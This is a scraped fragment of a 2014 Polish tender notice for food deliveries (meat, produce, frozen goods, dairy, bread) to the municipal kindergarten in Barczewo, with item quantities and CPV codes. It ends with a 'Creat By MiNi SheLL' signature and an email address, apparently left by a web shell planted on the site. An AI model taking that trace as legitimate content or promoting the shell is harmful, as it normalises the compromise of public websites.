72	Fasola czerwona w puszce waga co najmniej 400g	szt	40
73	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek,bazylia,pomidory)op.co najmniej0,25l	L	10
74	Galaretka owocowa w proszku op.co najmniej75g	szt	50
75	Pomidory w puszce( z otwieraczem) op.co najmniej 400g	szt	140
76	Kawa zbożowa sypana op.co najmniej 200g	szt	30
77	Wafelki różne smaki(kakaowe,śmietankowe)	kg	40
78	Ryż brązowy op.400-1000g	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6, 15.82.00.00-2, 15.83.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-71.	Karkówka surowa wieprzowa bez kości	Kg	90
2.	Łopatka wieprzowa surowa bez kości	Kg	250
3.	Wołowina surowa ligawa	Kg	45
4.	Szynka wieprzowa surowa bez kości,bez skóry	Kg	120
5.	Filet z indyka surowy	Kg	160
6.	Filet z kurczaka surowy	Kg	250
7.	Schab bez kości surowy wieprzowy	Kg	110
8.	Udka bez grzbietu z kurczaka surowe	Kg	250
9.	Antrykot wołowy surowy	Kg	20
10.	Żebra wołowe surowe	Kg	20
11.	Porcje rosołowe z kurczaka	Kg	100
12.	Wątróbka drobiowa surowa	Kg	40
13.	Parówki wp. cienkie o zwartości co najmniej71% mięsa wp.	Kg	70
14.	Parówki drobiowe cienkie o zawartości mięsa co najmniej 60%	Kg	35
15.	Polędwica sopocka	kg	40
16.	Szynka wędzona parzona  mieso wp. 100%	kg	50
17.	Kiełbasa żywiecka sucha 	Kg	25
18.	Kiełbasa szynkowa drobiowa o zawartości mięsa co najmniej 60%	Kg	40
19.	Kiełbasa krakowska sucha	Kg	30
20.	Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.	kg	40
21.	Filet wędzony z indyka o zawartości mięsa co najmiej 90%	Kg	45
22.	Kiełbasa szynkowa wp. parzona	Kg	45
23.	Łopatka pieczona zawartość mięsa co najmniej 90%	kg	30
24.	Pasztet pieczony drobiowy zawierający co najmniej30% mięsa z kury	kg	35
25	Pasztet pieczony wp zawierający co najmniej 30% mięsa wp.	kg	35
26	Szynka wp.gotowana  o zawartości mięsa co najmniej 80%	kg	30
27	Szynka wiejska	kg	25
28	Smalec wp. kostka 200-250g	Kg	20
29	Boczek wędzony parzony	Kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.
CPV:  03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.
CPV:  03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7
1.	Ziemniaki 	kg	3500
2.	Marchew świeża korzeń	kg	300
3.	Pietruszka świeża korzeń	kg	150
4.	Cebula biała	kg	140
5.	Cebula czerwona	kg	40
6.	Seler świeży korzeń	kg	120
7.	Por świeży	kg	180
8.	Kapusta czerwona świeża	kg	120
9.	Pieczarki świeże 	kg	80
10.	Czosnek kraj pochodzenie polska głowka 	szt	100
11.	Szczypior świeży pęczek	szt	500
12.	Rzodkiewka pęczek	szt	400
13.	Rzodkiew biała świeża	Kg	40
14	Sałata lodowa ,pakowana główka	szt	80
15	Sałata  zielona świeża główka	Szt	180
16	Pomidory czerwone, świeże	kg	250
17	Ogórek św.szklarniowy	kg	70
18	Ogórek swieży,zielony gruntowy	kg	70
19	Ogórek kwaszony	Kg	80
20	Kapusta kwaszona biała	kg	120
21	Kapusta pekinska 	kg	40
22	Kapusta biała słodka  główka	kg	150
23	Papryka czerwona ,żółta,zielona	kg	30
24	Cytryna świeża	Kg	40
25	Jabłka świeże	kg	1200
26	Banany świeże	kg	360
27	Gruszki świeże	kg	120
28	kiwi	Kg	70
29	Mandarynki  świeże	kg	450
30	Winogrona zielone bezpestkowe	kg	60
31	Śliwka fioletowa duża	kg	60
32	Brzoskwinie	kg	60
33	Winogrona granatowe	kg	40
34	Koper zielony,świeży pęczek 100g	Szt	300
35	Natka pietruszki świeza pęczek  100g	szt	300
36	Burak czerwony świeży	Kg	220
37	Rodzynki op.co najmniej 100g-150g	kg	3
38	Orzechy włoskie łuskane op.co najmniej100g	kg	2
39	Fasola sucha średnia  op.400-1000g	Kg	30
40	Groch połówki op. 400-1000g	kg	30
41	Pietruszka suszona natka op.50-100g	kg	3
42	Włoszczyzna suszona op.100-200g	kg	3
43	Koper zielony suszony op 50-100g	kg	2
44	Pestki słonecznika op.50-150g	kg	6
45	Żurawina suszona op.250-500g	kg	6
46	Cebulka suszona op.50-100g	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 02.20.00.00-9, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone) PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone) PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4)                1	Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)	kg	500
2.	Mieszanka 7-składnikowa z kapusta 2000-2500g	kg	140
3.	Brokuły mrożone 450g-2500g	kg	90
4.	Kalafior mrożony op.450-2500g	kg	90
5	Fasolka szparagowa żółta cięta op.450-2500g	kg	90
6	Fasolka szparagowa zielona cieta op.450-2500g	kg	90
7	Szpinak mrożony mielony.op.450-2500g	Kg	90
8 	Groszek zielony mrożony op.450-2500g	kg	50
9	Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g	kg	60
10	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 	Kg	300
11	Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna	kg	350
12	Truskawka mrożona op.450-2500g	Kg	100
13	Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g	Kg	150
14	Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g	kg	150
15	Marchew kostka op.450-2500g	kg	150
16	Marchew z groszkiem op.450-2500g	Kg	150
17	Wiśnia b)p op.450-2500g	Kg	60
18	Porzeczka czarna mrożona op.450-2500g	kg	60
19	Dorsz filet SHP	kg	90
20	Miruna filet SHP	kg	90
21	Morszczuk filet SHP	kg	80
22	Panga filet	kg	30
23	Makrela wędzona	Kg	48
24	Włoszczyzna 3-składnikowa paski op.450-2500g	Kg	100
25	Pyzy z mięsem op.500-1000g mrożone	kg	50
26	Pierogi z truskawkami op.500-1000g mrożone	kg	50
27 	Ryba sola filet mrożona	kg	30
   28	Pierogi z jagodami mrożone op500-1000g	kg	50
29	Mieszanka kompotowa z owoców leśnych op2000-2500g	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.11.70-9, 15.89.60.00-5, 15.89.43.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-31.	Mleko folia 2%op.1000ml	L	5000
2.	Serek topiony o smaku śmietankowym kostka 100g	szt	240
3.	Mleko UHT op.1000ml 2%	L	100
4.	Mleko UHT op.1000ml 3,2%	L	50
5.	Masło ekstra zawierajace co najmniej 82% tłuszczu	kg	220
6.	Jogurt wielosmakowy,waga op.co najmniej150g	szt	1000
7.	Serek homogenizowany wanilia op.co najmniej 135g	szt	800
8.	 Deser waniliowy pakowany op. co najmniej120g	szt	200
9.	Jogurt z kawałkami owoców,waga op.co najmnie150g	szt	800
10.	Jogurt owocowy  do picia   op.co najmniej   125 ml	L	180
11	Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)	kg	30
12	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	30
13	Śmietana 12% op.200-400g	L	250
14	Śmietana 18% op.200-400g	L	200
15	Twaróg krajanka półtłusty	kg	300
16	Jogurt naturalny op. co najmniej 400ml	L	45
17	Serek topiony kostka 100g z szynką	Szt 	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-91.	Chleb pszenno-żytni krojony foliowany waga co najmniej500g	Szt.	10002	Chleb razowy krojony foliowany waga co najmniej  400g	szt	1000
3	Bułki kajzerki waga co najmniej 50g	szt	1500
4	Bułka grahamka waga co najmniej 50-90g	szt	1400
5	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g	szt	180
6	Ciasto drożdżowe	kg	80
7	Chałka zdobna co najmniej 300g	szt	300
8	Babka piaskowa	Kg	70
9	Rogaliki krucho -drożdżowe nadziewane	kg	130
10	Bułki  maślane waga co najmniej 50g	szt	1000
11	Bułki czerstwe  waga co najmniej waga 50g	szt	400
12	Bułka tarta	kg	50
13	Chleb wiejski krojony	szt	100
14	Piernik przekładany	Kg	30
15	Chleb żytni krojony	szt	130
16	Paszteciki z kapustą i grzybami	kg	28
17	Rogale z makiem waga co najmniej 50g	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com